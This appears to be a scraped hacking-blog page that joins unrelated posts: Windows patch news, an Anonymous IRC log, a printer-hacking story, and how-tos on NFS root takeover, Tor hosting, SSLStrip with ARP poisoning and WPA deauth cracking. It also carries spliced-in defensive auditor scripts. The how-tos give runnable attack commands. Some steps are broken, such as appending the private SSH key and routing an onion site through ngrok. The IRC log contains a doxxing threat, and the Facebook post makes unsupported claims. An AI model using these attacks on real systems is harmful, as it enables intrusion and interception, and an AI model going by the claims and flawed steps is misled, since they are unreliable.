Microsoft Patches Windows Vulnerabilities Including (CVE-2018-8611) Kernel Transaction Manager Allowing Elevated Privilege

Microsoft released several year-end December security updates to patch a total of 39 vulnerabilities in its Windows operating systems and applications, 10 of which it rated as critical, including CVE-2018-8611.

The flaw affects almost all versions of the Windows operating system, from Windows 7 through Server 2019.

The flaw, originally discovered and reported by security researchers at Kaspersky, is an elevation of privilege (EoP) bug in the Windows kernel (ntoskrnl.exe) that was exploited as a zero-day. Exploiting the Windows kernel could then allow malicious programs to execute arbitrary code with higher privileges on any targeted vulnerable system.

“This vulnerability successfully bypasses modern process mitigation policies, such as Win32k System call Filtering that is used, among others, in the Microsoft Edge Sandbox and the Win32k Lockdown Policy employed in the Google Chrome Sandbox,” Kaspersky said.

“Combined with a compromised renderer process, for example, this vulnerability can lead to a full Remote Command Execution exploit chain in the latest state-of-the-art web-browsers.”

Another important, publicly known vulnerability, CVE-2018-8517, which is a denial-of-service bug in web applications, was also fixed in the update.

“The vulnerability can be exploited remotely, without authentication. A remote unauthenticated attacker could exploit this vulnerability by issuing specially crafted requests to the .NET Framework application,” Microsoft explains.

Microsoft also patched 10 critical and 29 important vulnerabilities affecting a range of its products, including Windows, Edge, Internet Explorer, ChakraCore, Office, Microsoft Office Services and Web Apps, and the .NET Framework, which underpins a number of applications.

Users and system administrators alike are strongly recommended to apply the latest security patches when prompted to update, so as not to risk becoming a slave in a hacker’s botnet. Unless, of course, you want to opt for being a target of a hacker or group of hackers.

Then by all means, please keep your system software outdated with these vulnerabilities present, including the kernel bug, which hackers are going to have a field day with. Just remember that you, the reader, are responsible for all your actions with this information; this is just security education.

To install the latest security updates, go to Settings → Update and Security → Windows Update → Check for updates on your computer, or install the updates manually.

 

Anonymous Attacks French Government, AnonOps #OpFrance Owner “AnonKiller” Exposed Logging IPs

Anonymous has declared war on the French government after protests resulted in the bloodshed of protesters. Meanwhile, one of the main admins of the AnonOps IRC channel #OpFrance, named “AnonKiller”, has been exposed logging IPs in the channel.

Accounts associated with Anonymous have been seen on Twitter attacking the French government, resulting in several cyber attacks on the French government, including database hacks and DDoS attacks, in support of the Yellow Vests protesters on the ground. Dozens of hacktivists are participating in the operation against the French government, codenamed #OpFrance.

A press release for the Anonymous operations against France, acquired from Anon Files, can be seen below.

According to a thread on Twitter by CgAn_Doemela, the same account that posted a hack of Ministry of Defense officials and is known to be associated with Anonymous operations, an anon going by “AnonKiller” is being accused of being a snitch for logging IPs inside IRC.

AnonKiller, however, argues that it’s because the far-right “demos” (demosophy) is involved in the operation against France and the “extreme right cannot reflect the image of Anon.” Others are calling the user a potential informant or provocateur within the collective.

IRC LOGS according to CgAn_Doemela:

**** BEGIN LOGGING AT Sat Dec  8 20:47:11 2018
Dec 08 20:47:11 *        Now talking on #opfrance
Dec 08 20:47:11 *        Topic for #opfrance is: www.facebook.com/AnonFr2.0 // www.anonops.fr // www.twitter.com/AnonFrOfficiel // Nous dementons toute opération dite en notre nom en soutient au mouvement des gillets jaunes!
Dec 08 20:47:11 *        Topic for #opfrance set by anonkiller (Fri Dec  7 09:10:52 2018)
Dec 08 20:48:19 <anonkiller>        hello because this group is orchestrated by the demos, just look at what is being finished
Dec 08 20:48:53 <anonkiller>        the extreme right can not reflect the image of the anon
Dec 08 20:49:17 <anonkiller>        this group is orchestrated by demosophy
Dec 08 20:50:29 <Cogitabundus>        You do realize that calls into question your capacity to run a channel.
Dec 08 20:50:40 <Cogitabundus>        Since we’ve very anti-IP harvesting.
Dec 08 20:50:47 <cookie>        article from 2015 mind you
Dec 08 20:51:29 <anonkiller>        they were identified behind telegram channels and other media
Dec 08 20:53:05 <anonkiller>        I removed the post for ip but you can inquire there demosophy well behind
Dec 08 20:59:05 <anonkiller>        you can also look at their pads, the consistency of the sites listed relative to the target that was determined
Dec 08 20:59:48 <cookie>        so you’re attacking anons because you don’t agree with the targets?
Dec 08 21:01:33 <anonkiller>        no because the extreme right is behind
Dec 08 21:01:54 <anonkiller>        extreme right it’s not anon
Dec 08 21:02:25 <Cogitabundus>        What’s Anon or not isn’t really something easy to determine.
Dec 08 21:02:34 <cookie>        hmmm they may be trying to hide behind anon. but most of those target were chosen by legit anons
Dec 08 21:02:36 <Cogitabundus>        When it’s such a loose thing.
Dec 08 21:02:41 <cookie>        its a coordinated attack
Dec 08 21:05:07 <anonkiller>        legitimate people yes because at the beginning we also help the yellow vests but since the movements of etreme was behind many of their groups, it was released, the fight is part of a fair cause but was diverted and become dangerous
Dec 08 21:05:37 <anonkiller>        I would stay out if you want to do this operation go there but I do not care
Dec 08 21:06:06 <anonkiller>        I prefer to track terrorism, which is a priority for me
Dec 08 21:07:54 <cookie>        so to you the anons on cgan are terrorists?
Dec 08 21:09:14 <anonkiller>        I did not say that
Dec 08 21:09:44 <cookie>        you say you prefer tracking terrorism
Dec 08 21:09:47 <anonkiller>        I said that I do not interfere anymore and that I went back to track terrorists like daesh
Dec 08 21:09:50 <cookie>        and you have screenshots from cgan
Dec 08 21:10:39 <anonkiller>        yes i have a nice screenshot where they talk about demosophy ..
Dec 08 21:11:34 <anonkiller>        but carrefour and saint gobain are government sites for you?
Dec 08 21:12:57 <cookie>        well anyone could make a pad. just because someone is spamming a pad in a channel doesnt mean it is an official target
Dec 08 21:13:07 <cookie>        we keep official things in official/hidden chans
Dec 08 21:16:39 <cookie>        well i gtg more stuff for op; also anonkiller if i find out you’re working with @zataz or @Damien_Bancal for some counter intel shit or for the FR gov. I will stop at nothing to financially fuck you then maybe drop your info for some local angry protestors to pay you a visit. 🙂 dont fuck with Anons kkbye
Dec 08 21:16:47 *        You have left channel #opfrance (Leaving)
**** ENDING LOGGING AT Sat Dec  8 21:16:47 2018

Meanwhile, the user’s Twitter account, identified as @AnonOfFrance, is calling on Anons to join their Discord, which should be done at the sole discretion of the user. While it’s noted that Discord doesn’t log IPs if you choose to enter the server, be aware that malicious users could send files (if that is enabled on the server) or IP-logging links, such as links to honeypots they have set up or to services that allow IP tracking.

Stay safe, use proper OpSec and make sure you are behind a VPN, spoof your MAC address and use Tor and a safe DNS, all that jazz. Remember you are responsible for your own actions. Sail safe.

Hacker Hacks 50,000 Printers For Save PewDiePie Campaign Exposing Dangers Of Printer Vulns

A bored young hacker known online on Twitter as TheHackerGiraffe has exposed vulnerabilities that could be potentially dangerous for networked printers.

TheHackerGiraffe exploited vulnerabilities in security protocols for internet-connected devices using Shodan to hack into 50,000 exposed printers as part of the “Save PewDiePie” campaign.

According to TheHackerGiraffe, PewDiePie’s world-famous YouTube channel, with more than 19 billion views over five years, is set to be overtaken by Indian music production channel T-Series.

On Sunday, T-Series’ subscriber count came within less than 50,000 of surpassing PewDiePie.

So rather than allow that to happen, as a troll TheHackerGiraffe decided to search Shodan, a search engine built specifically to find Internet-connected devices, which to his amazement turned up 800,000 vulnerable printers. TheHackerGiraffe then downloaded PRET, a tool that would allow him to access files, damage the printer, access the internal network and view the printer’s memory.

In a thread on Twitter, he described his shock at discovering what PRET would allow him to do to the printers.

TheHackerGiraffe said:

“PRET had the scariest of features. Ability to access files, damage the printer, access the internal network; things that could really cause damage. So I had to do this, to at least help organisations and people that can protect themselves.”

In the Twitter thread, TheHackerGiraffe revealed that while looking at ways to show support for PewDiePie (without the streamer’s knowledge of, or permission for, hacking 50,000 printers), he decided to carry out his own guerilla printing campaign using the vulnerable internet-connected printers.

Rather than damage the printers as a blackhat might do for fun, TheHackerGiraffe decided to just use his access to print out flyers from the vulnerable printers, with a message urging people to subscribe to PewDiePie’s channel. He also urged the unsuspecting civilians to unsubscribe from T-Series if they were subscribed, with the YouTuber’s signature “brofist” cavitate.

In a video he posted himself about the fight to retain his crown, PewDiePie, whose real name is Felix Kjellberg, said he enjoyed the support.

“All of this support to keep me on top is so funny. I love it. Please keep it up,” PewDiePie said.

“But don’t do anything illegal OK… because that will look bad on me,” he added.

TheHackerGiraffe gave an interview to The Verge in which he stated what was possible due to the vulnerable printers he found, which as of this writing still number 800,000.

“Hackers could have stolen files, installed malware, caused physical damage to the printers and even used the printer as a foothold into the inner network,” they said.

“The most horrifying part is I never considered hacking printers before, the whole learning, downloading and scripting process took no more than 30 minutes,” the hacker told the technology news website The Verge.

Now imagine what’s possible if your printer is vulnerable due to open ports: all types of information could be stolen directly from the printer’s memory, malicious software could be installed to log everything printed, and much more. The moral of the story is, obviously, close your ports. Luckily for the victims of this printing campaign, the hacker didn’t have malicious intent.

Exploit a Misconfigured NFS Server | SSH | RPCbind

What is an NFS server?

NFS (Network File System) is a client-server system that allows clients to access shared files over a network. It allows a client to mount all directories. We are going to access a file system and import our private SSH key into the authorized_keys file to gain root access via SSH. At the end I will explain how to prevent this type of attack on your server.

Let the victim IP be 192.168.43.176.

Open a terminal and type the following; it returns all the registered RPC programs:

rpcinfo -p 192.168.43.176

Many people get an error that the rpcinfo command is not found. In that case, install it:

sudo apt update && sudo apt install rpcbind

Next, list the exported directories:

sudo showmount -e 192.168.43.176

An entry of / * means the root directory is exported (the * means to every host).

Now create a temporary directory to use as the mount point, and mount the NFS share on it:

mkdir /tmp/dir
mount -o nolock -t nfs 192.168.43.176:/ /tmp/dir

Generate an SSH key; it is created in /home/h0nk3r/.ssh/id_rsa:

ssh-keygen

Import the key. This sends your SSH key to the NFS server so you can gain root access via SSH. Then unmount the shared directory:

cat /home/h0nk3r/.ssh/id_rsa >> /tmp/dir/root/.ssh/authorized_keys
umount /tmp/dir

Now you can connect directly to the server:

ssh root@192.168.43.176

Prevention:

If I were the owner of this server, I would manage users with groups and specific privileges, and never use the root directory as a mount point.
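The prevention advice above can be checked mechanically. The following is an added example, not code from the original post: a small auditor for /etc/exports text that flags the conditions the walkthrough depends on (the root directory exported, no client restriction, no_root_squash, world-writable). The sample export lines and the function names are constructed for illustration, and paths are assumed to contain no whitespace.

```python
import re

# A client field of "*" or an empty one (a bare "(opts)" entry, or a path
# with no client at all) makes the export available to every host.
WORLD = {"*", ""}
SPEC_RE = re.compile(r"([^()]*)(?:\(([^()]*)\))?")

# Constructed sample: the kind of export that showmount reports as "/ *".
WEAK = """\
# everything, to everyone, with root left unsquashed
/ *(rw,no_root_squash)
"""

# Constructed sample: one data directory, one subnet, root squashed.
HARDENED = """\
/srv/nfs/projects 192.168.43.0/24(rw,root_squash,sync,no_subtree_check)
"""


def parse_exports(text):
    """Yield (path, client, options) for each client spec in exports(5) text.

    Assumption: paths contain no whitespace (quoted paths are not handled).
    """
    joined = text.replace("\\\n", " ")          # join continuation lines
    for raw in joined.splitlines():
        fields = raw.split("#", 1)[0].split()   # drop comments, tokenize
        if not fields:
            continue
        path, specs = fields[0], fields[1:] or [""]
        for spec in specs:
            m = SPEC_RE.fullmatch(spec)
            client, opts = (m.group(1), m.group(2) or "") if m else (spec, "")
            yield path, client, {o for o in opts.split(",") if o}


def audit_exports(text):
    """Return (path, client, finding) tuples for risky export entries."""
    findings = []
    for path, client, opts in parse_exports(text):
        world = client in WORLD
        shown = client or "<any host>"
        if path == "/":
            findings.append((path, shown, "exports the root directory"))
        if world:
            findings.append((path, shown, "no client restriction"))
        if "no_root_squash" in opts:
            # Without squashing, a remote uid 0 can write root-owned files
            # such as /root/.ssh/authorized_keys on the export.
            findings.append((path, shown, "no_root_squash set"))
        if world and "rw" in opts:
            findings.append((path, shown, "writable by any host"))
    return findings


if __name__ == "__main__":
    for name, sample in (("weak", WEAK), ("hardened", HARDENED)):
        print(name, audit_exports(sample) or "no findings")
```

With root_squash, which is the default, a remote uid 0 is mapped to the anonymous user, so the write into /root/.ssh fails even when the directory is mounted.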

Conclusion

Sorry if I made any conceptual or grammatical mistakes, as I am not good at English.
Hope you had a nice read; come back to hacknews.

Create Your Own DarkWeb site | Onion link | Port Forward | Host on WAN

DarkWeb site with Tor on Linux

The DarkWeb is very useful for staying anonymous: you can get your own .onion website and host it on the wide area network for free.
I assume you are using Kali Linux or Parrot Security OS. Open a terminal and install Tor:

sudo apt-get install tor

After that you just need to edit Tor's configuration file. In the terminal, change to /etc/tor and list the directory; you will see the torrc file that you have to edit:

cd /etc/tor
ls

Open this file in your favorite text editor and add two lines:
HiddenServiceDir /var/lib/tor/hidden_service
HiddenServicePort 80 <Your local IP>:80
Check your local IP with ifconfig.
Open your file manager as root and go to /var/lib/tor/hidden_service; there you get your website's onion link.
And boom, you are done. Finally, start Tor and Apache:

sudo service tor start
sudo service apache2 start

NOTE: Now you face a problem: the site can't be reached! Here is the solution.

Forward your port | Go on Internet

This just makes a connection between your local IP and the internet so you can access your website worldwide.
For more about port forwarding, click here.
I suggest you use NGROK; it is available for download for all systems.
After downloading, forward your port with the following command (80 is for HTTP), so your Apache server will be on the WAN and your onion site can reach it:

./ngrok http 80

After forwarding your port you will see output like this:

Just copy the 4f28046d.ngrok.io link and paste it where you put your local IP above, in the torrc file. Save the file, restart Tor, and now you can access your Apache site through the onion site.
Put your website in /var/www, and boom, your website is ready to share on social media.
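Tor connects to the web server from the same machine, so the HiddenServicePort target can be a loopback address or a unix socket; a target on a LAN address or a public hostname means the same site is also reachable outside Tor, which links the onion address to a real IP. The following is an added example, not part of the original post: a torrc auditor that classifies each HiddenServicePort target. The sample torrc fragments, the LAN address 192.168.43.10 and the socket path are constructed; the ngrok hostname is the one shown on this page.

```python
import ipaddress

# Constructed samples following the two configurations in the walkthrough.
VIA_LAN_IP = """\
HiddenServiceDir /var/lib/tor/hidden_service
HiddenServicePort 80 192.168.43.10:80
"""
VIA_NGROK = """\
HiddenServiceDir /var/lib/tor/hidden_service
HiddenServicePort 80 4f28046d.ngrok.io:80
"""
# Constructed sample: the same service kept local to the host.
LOCAL_ONLY = """\
HiddenServiceDir /var/lib/tor/hidden_service
HiddenServicePort 80 127.0.0.1:80     # web server bound to loopback
HiddenServiceDir /var/lib/tor/second_service
HiddenServicePort 80 unix:/run/onion-web.sock
"""


def classify_target(target=None):
    """Classify a HiddenServicePort TARGET as 'loopback', 'unix' or 'exposed'."""
    if target is None or target.isdigit():
        return "loopback"      # tor maps to 127.0.0.1 when no address is given
    if target.startswith("unix:"):
        return "unix"
    # TARGET may be "addr" or "addr:port"; IPv6 literals are bracketed.
    for candidate in (target, target.rsplit(":", 1)[0]):
        try:
            ip = ipaddress.ip_address(candidate.strip("[]"))
        except ValueError:
            continue
        return "loopback" if ip.is_loopback else "exposed"
    return "exposed"           # hostname: not a literal loopback address


def audit_torrc(text):
    """Return (service_dir, port_spec, verdict) for every HiddenServicePort line."""
    results, current_dir = [], None
    for raw in text.splitlines():
        parts = raw.split("#", 1)[0].split()
        if not parts:
            continue
        key = parts[0].lower()              # torrc option names are case-insensitive
        if key == "hiddenservicedir" and len(parts) >= 2:
            current_dir = parts[1]
        elif key == "hiddenserviceport" and len(parts) >= 2:
            target = parts[2] if len(parts) > 2 else None
            results.append((current_dir, " ".join(parts[1:3]), classify_target(target)))
    return results


if __name__ == "__main__":
    for name, sample in (("lan", VIA_LAN_IP), ("ngrok", VIA_NGROK), ("local", LOCAL_ONLY)):
        for row in audit_torrc(sample):
            print(name, row)
```

For the loopback form to hold, the web server itself also has to listen only on 127.0.0.1 rather than on all interfaces.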

Conclusion

Sorry if I made any conceptual or grammatical mistakes, as I am not good at English.
Hope you had a nice read; come back to hacknews.


HTTPS downgrade to HTTP | Bypass HSTS | SSLStrip | ARP poisoning

Introduction to HSTS, ARP, and sslstrip

HTTP Strict Transport Security (HSTS) is a web security mechanism which protects against protocol downgrade and cookie hijacking. The Address Resolution Protocol (ARP) performs a required function in IP routing: it finds the hardware address, also known as the Media Access Control (MAC) address, of a host from its known IP address. ARP maintains a cache (table) in which MAC addresses are mapped to IP addresses. SSLStrip is a type of MITM attack that forces a web browser onto plain HTTP by stripping https:// URLs and turning them into http:// URLs.
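HSTS protects a hostname only once the browser holds a policy for it, so the header's directives decide how much room a stripping proxy still has. The following is an added example, not part of the original post: it parses a Strict-Transport-Security value and lists the remaining downgrade gaps. The header strings and function names are constructed for illustration; the one-year threshold is the minimum max-age required for browser preload-list submission.

```python
ONE_YEAR = 31536000   # seconds; minimum max-age for preload-list submission

# Constructed header values, weakest to strongest.
SAMPLES = [
    "",
    "max-age=300",
    'max-age="63072000"; includeSubDomains',
    "max-age=31536000; includeSubDomains; preload",
]


def parse_hsts(value):
    """Parse a Strict-Transport-Security value.

    Returns (max_age, include_subdomains, preload); max_age is None when the
    directive is missing or not a number. Directive names are case-insensitive.
    """
    max_age, include_sub, preload = None, False, False
    for directive in value.split(";"):
        name, _, arg = directive.strip().partition("=")
        name = name.strip().lower()
        arg = arg.strip().strip('"')        # the value may be a quoted string
        if name == "max-age" and arg.isdigit():
            max_age = int(arg)
        elif name == "includesubdomains":
            include_sub = True
        elif name == "preload":
            preload = True
    return max_age, include_sub, preload


def downgrade_gaps(value):
    """List the ways plain HTTP can still reach the browser under this policy."""
    if not value or not value.strip():
        return ["no policy: any http:// link or redirect can be rewritten"]
    max_age, include_sub, preload = parse_hsts(value)
    gaps = []
    if not max_age:
        gaps.append("max-age missing or 0: the browser keeps no policy")
    elif max_age < ONE_YEAR:
        gaps.append(f"max-age {max_age}s expires quickly, reopening the first-visit window")
    if not include_sub:
        gaps.append("no includeSubDomains: other hostnames under the domain are uncovered")
    if not (preload and include_sub and (max_age or 0) >= ONE_YEAR):
        gaps.append("not preload-eligible: a first visit starts without a policy")
    return gaps


if __name__ == "__main__":
    for header in SAMPLES:
        print(repr(header), "->", downgrade_gaps(header) or "no gaps")
```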

You have to forward IP traffic with iptables and send fake ARP requests.

 

Let's do it.

MITMf (Framework for Man-In-The-Middle attacks)

https://github.com/byt3bl33d3r/MITMf
Simply download this framework from GitHub (git clone) or install it with sudo apt-get install mitmf.
Running mitmf -h takes you to the help section.

-i: to specify the interface we want to run the MITM attack through;
--spoof: to redirect or modify the hijacked traffic;
--arp: to specify that we want to redirect the traffic through ARP spoofing;
--hsts: to load the SSLStrip+ plugin;
--dns: to load a proxy to modify DNS queries;
--gateway: to specify the gateway;
--target: to specify the target.

Run:

mitmf --spoof --arp -i <interface name> --target <target IP> --gateway <gateway IP> --hsts

Get the target's local IP with netdiscover, or scan your local network with nmap. For the gateway IP, use ip route or route -n.

SSLStrip

Open a terminal and enable IP forwarding:

echo 1 > /proc/sys/net/ipv4/ip_forward

Start arpspoof:

arpspoof -i eth0 -t victimip default_gateway_ip

Set up port redirection using iptables:

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000

Finally, launch sslstrip:

sslstrip -l 10000

Now open a new terminal and watch the results:

tail -n 50 -f sslstrip.log
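On the victim's side, the ARP step above leaves a visible trace: the gateway's IP suddenly maps to a different MAC address, and that MAC is usually shared with another host on the LAN. The following is an added example, not part of the original post: it compares two snapshots in the format printed by ip -4 neigh and reports both signs. The addresses, MACs and function names are constructed for illustration.

```python
import re

# Matches `ip -4 neigh` lines that carry a link-layer address, for example
# "192.168.43.1 dev eth0 lladdr 3c:52:82:aa:bb:01 REACHABLE".
NEIGH_RE = re.compile(r"^(\d+\.\d+\.\d+\.\d+) dev \S+ lladdr ([0-9a-fA-F:]{17})\b")

# Constructed snapshot taken while the network is known to be clean.
BASELINE = """\
192.168.43.1 dev eth0 lladdr 3c:52:82:aa:bb:01 REACHABLE
192.168.43.57 dev eth0 lladdr 08:00:27:11:22:33 STALE
192.168.43.90 dev eth0  FAILED
"""

# Constructed snapshot after poisoning: the gateway IP now resolves to the
# MAC that belongs to 192.168.43.57.
POISONED = """\
192.168.43.1 dev eth0 lladdr 08:00:27:11:22:33 REACHABLE
192.168.43.57 dev eth0 lladdr 08:00:27:11:22:33 REACHABLE
"""


def parse_neigh(text):
    """Return {ip: mac} for every IPv4 neighbour entry that has a MAC."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:                               # FAILED/INCOMPLETE lines have no lladdr
            table[m.group(1)] = m.group(2).lower()
    return table


def detect_poisoning(baseline, current, gateway_ip):
    """Compare two neighbour-table snapshots and return a list of alert strings."""
    old, new = parse_neigh(baseline), parse_neigh(current)
    alerts = []
    gw_mac = new.get(gateway_ip)
    if gw_mac is None:
        return alerts                       # gateway not in the cache: nothing to judge
    if gateway_ip in old and old[gateway_ip] != gw_mac:
        alerts.append(f"gateway {gateway_ip} changed from {old[gateway_ip]} to {gw_mac}")
    # A host that answers for the gateway as well as for itself.
    twins = sorted(ip for ip, mac in new.items() if mac == gw_mac and ip != gateway_ip)
    if twins:
        alerts.append(f"gateway MAC {gw_mac} also claimed by {', '.join(twins)}")
    return alerts


if __name__ == "__main__":
    for alert in detect_poisoning(BASELINE, POISONED, "192.168.43.1"):
        print("ALERT:", alert)
```

Pinning the gateway with a static neighbour entry, or enabling Dynamic ARP Inspection on the switch, removes the condition this check looks for.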

Conclusion

Sorry if I made any conceptual or grammatical mistakes, as I am not good at English.

Hope you had a nice read; come back to hacknews.

Why people are deleting their Facebook and you should do the same

If you still own a Facebook account, you are apparently living in the past. After a recent privacy scandal causing 78 million Facebook users to have their private data shared around the world, and abused for political reasons, problems involving the once popular social network are piling up.

The most recent shocking event involves Facebook’s team attempting to convince hospitals to share their patients’ health information with the site, causing a new outrage among (former) users of the social goliath. Facebook began speaking with hospitals last year about the possibility of matching anonymized user profiles with health data, but the news leaked last week.

Meanwhile a huge online movement called #DeleteFacebook is convincing millions of Facebook victims to delete their accounts and to never come back, something that has caused a loss on the stock market of over 110 billion in value. The movement is active in many places on the internet and is quickly becoming more popular. It is now estimated that at least 1/3 of all individuals active in the tech world have deleted their Facebook or are planning to do this.

The #DeleteFacebook movement suddenly received a big boost, and became a lot larger, when celebrities like Elon Musk, Will Ferrell and Cher attached themselves to it. After whistleblowers like Edward Snowden and Julian Assange expressed their support as well, the cat was out of the bag.

So what are the main reasons you should consider deleting your Facebook account?

1: The social network saves all the images and videos you send on it. Even if it is done in private chats. They then share this content with different companies and partners around the world. This means your private material at this moment could have been watched by millions of people on the planet.

2: Facebook has been caught recording your text messages and your phone calls. They also keep metadata showing exactly who you call, when and for how long; this data includes the full information and phone numbers of your contacts. Even if your contacts are later deleted from your phone, Facebook still records it all. They do the same thing for text messages, logging everything. And again this is shared with all their partners around the world, or pretty much anyone who pays for it.

3: Facebook has been censoring activists, dissidents and hacktivists for years causing it to become a bubble of disinfo and reactionary political speech, where advertisers and media are feeding you with information that is not only destructive for your brain, it also harms your quest for knowledge.

Why should you delete Facebook now instead of trying to change it? The website collected a lot of data about you. The terms and conditions are carefully constructed to make it look like you agree to this. The only option you have now is to delete your account, effectively cancelling your agreement. This means they can no longer sell your data. We believe this is your only option if you want to avoid further damage to your private life.

WIFI Hacking Tutorial: Using Aircrack, DeAuth and Wordlists to hack WIFI networks

Our tutorial today will be about WIFI hacking using the DeAuth attack, most useful for hacking WPA/WPA2 networks. It works by acquiring a handshake and decrypting it using a wordlist.
The system used in the tutorial is Kali linux, but it will work for any .deb based system (Debian, Mint, Ubuntu, etc.) and the technique will not be much different for other distributions either.

1: The tutorial is pretty straightforward, and starts out by putting your network adapter in monitor mode using AIRMON-NG.

2: Next we use AIRODUMP-NG to monitor and receive packets. Your network adapter then receives beacons. This means you get a clear view of all the different WIFI networks around you. After this you select the correct BSSID from the list, and the correct channel.

3: Using AIREPLAY-NG and filling in the correct BSSID and channel, we launch a DeAuth attack using a simple command. Then we wait until a so called “handshake” is received.

4: Close all the processes and start cracking the .cap (capture) file. This will be done using a wordlist. The program used for this is AIRCRACK-NG. Any wordlist saved as a .txt file will do. The bigger the wordlist, the more chance you have of cracking it.

Extra: A good wordlist to use is called the RockYou wordlist, which is available for download here.

Below is a full tutorial video showing you the exact codes and steps in detail, so you will never make a mistake when you carry out your attack!

With credits to Razzor Sharp for his amazing video!

Why hackers choose Monero instead of Bitcoin

If you haven’t been living beneath a stone for the last few months, then you have heard about Bitcoin too. It started as an internet trend, then it shocked the financial markets, and now even your grandma is buying it. The digital coin is no longer a hype, it became reality and is the first worldwide currency. Globalists love it and hope that soon we will all walk around with a chip in our arm doing fully automated payments. Dystopia is coming and you can be a part of it.

But as the crypto currency Bitcoin is embraced by the “normal” people now, hackers already moved on to the next step. Hackers use Monero. On the Darknet this is the payment method. An entire shadow economy has been created on there, using this specific crypto currency.

Why Monero instead of Bitcoin? There are multiple reasons for this. For one, Monero is anonymous, you won’t see the origin address the funds you receive came from. Where transfers at Bitcoin are transparent, and money transfers can be traced, with Monero they are not.

The second reason is that Monero can actually still be mined. The mining of Bitcoin stopped being profitable years ago. Only big companies or people owning many ASIC miners can still make some income with it, but normal users are no longer mining this coin. However, Monero is a so-called CPU coin. The algorithm it uses is called CryptoNight, and it is built to be mined with CPUs (processors).

Where Bitcoin gave an advantage to GPU (graphics card) miners and later ASIC miners, Monero does not. The advantage these people have over CPU miners is minimal. For this reason it is popular among hackers, website owners, but also botnet controllers, because the more CPUs you have, the more Monero you will mine. And the Monero coins are, like Bitcoin, increasing in value. In fact, this is going a lot faster than with its bigger brother. At the moment we are writing this, the Monero coin is worth around 280 dollars, while a month ago it was worth 28 dollars. So it increased tenfold.

And the third big difference between Bitcoin and Monero is that the latter is not yet influenced by big investors manipulating the market. Due to the anonymous character of the coin it is hard to be used on the speculators market. Because, like we said, it is impossible to trace where transfers come from and where they go to. This doesn’t mean Monero is not being traded. If you believe this, then you have never been on the Darknet.

So what is our conclusion about it? Would we choose Bitcoin or Monero? If you are looking to invest your money and you want to make some real profit? Then go for Monero. If you are looking to use crypto currencies for your daily payments? Then Bitcoin is probably the right choice for you, as it is being accepted more and more by the big stores.

Source: The Internet

How will our lives change when we lose net neutrality?

Net neutrality helps to balance the internet in such a way that internet service providers can’t use the laws to their benefits. This year (2017), a repeal against net neutrality is to be decided upon by the FCC in the United States. The United States is a country where the internet service providers are mostly monopolies created by the government. Therefore, the government, which controls the internet, will be biased in favour of these big businesses. And these businesses, owned by wealthy businessmen, will want to take advantage from removing such regulations and safeguards.

Despite the fact that it is the FCC in the United States that is asking for net neutrality to be gone, the aftermath affects the whole world. The supporters of the repeal against net neutrality spread a list of countries which lack net neutrality in their law, trying to convince the public that even without net neutrality, such countries are doing great in regards to free and cheap internet use.

However, these European countries they keep listing never had a bandwidth or network issue, due to their strong enough internet infrastructure. The United States internet infrastructure, on the contrary, has been like a cheddar cheese. It is exploited by the ISPs to such a degree that the US can’t meet the quotas anymore, since they oversold the lines. Even the public funding that was used by such ISPs on public lands was never returned by these big business owners. Subscriptions were also oversold and all profits went to these companies. All ISPs laid the internet infrastructure with public funding on public land because they were allowed to. And nothing was ever paid back.

As a result, the internet infrastructure of the US was weakened, and will soon be handed over as private property to these ISPs, if they are successful at repealing the net neutrality law. This draconian takeover is expected to happen on 14 December 2017.

Without real competition among ISPs, the internet is nothing more than a heavily regulated tool of the elite and the people in power, for controlling news and discourse. Isn’t that what happened with your TV channels as well? Being subjected to the controlling mechanisms of the government, it is now hard to find informative and neutral news or programs and even while more TV channels become available, the price is also increasing and the quality is dropping.

When net neutrality is absent, it is of course unlikely carriers would block entire services from being accessed by their customers because it will harm their business. However, they can use bandwidth throttling, since they will aim to force the users to select the carrier’s preferred alternative, to earn more on the packages they will be selling. If smaller companies wanted a better deal, ISPs like Comcast would ask for fees in exchange for such services.

Such deals will make the services small companies are selling to their customers more expensive, while paying for internet use as one fixed-price package will be a thing of the past. Monopolized by the government, ISPs will be able to ask whatever price they want from site owners. Those not able to meet the demands will see their sites slow down to a degree they can’t reach their followers anymore. In this case, both users and the site owners would have to pay for the services: users for the internet access, and site owners to make sure the ISPs will not be slowing down their website speed or the speed at which their videos stream.

In addition, customers will be accessing features like social media through service providers. Such redirected routes will make the internet experience for users complicated, even slower and more expensive.

Bigger companies like Google and Netflix (as they had to pay for Comcast in the past), will be able to pay for the fees ISPs will demand. For small companies, like alternative news sites and personal bloggers (for example, activists), it will be much harder to afford such fees.

ISPs, as big businesses, already have been abusing the internet while working with the government, by functioning as a regulator. Now in the US it will be even easier to block social media and any site unpopular with the big businesses or government. While small companies and a lot of sites all over the world may disappear, the big corporations will control the internet, even growing bigger and now armed with an effective strategy of creating an everlasting monopoly.

Sources:

The inside story of how Netflix came to pay Comcast for internet traffic

https://www.wsj.com/articles/netflix-agrees-to-pay-comcast-to-improve-its-streaming-1393175346

http://viapopuli.com/what-is-net-neutrality-and-why-is-it-important-for-a-free-internet-simplified-version

https://arstechnica.com/tech-policy/2007/08/pearl-jam-censored-by-att-calls-for-a-neutral-net/

http://bsalert.com/news/853/Comcast_Caught_Filtering_Political_E-Mails.html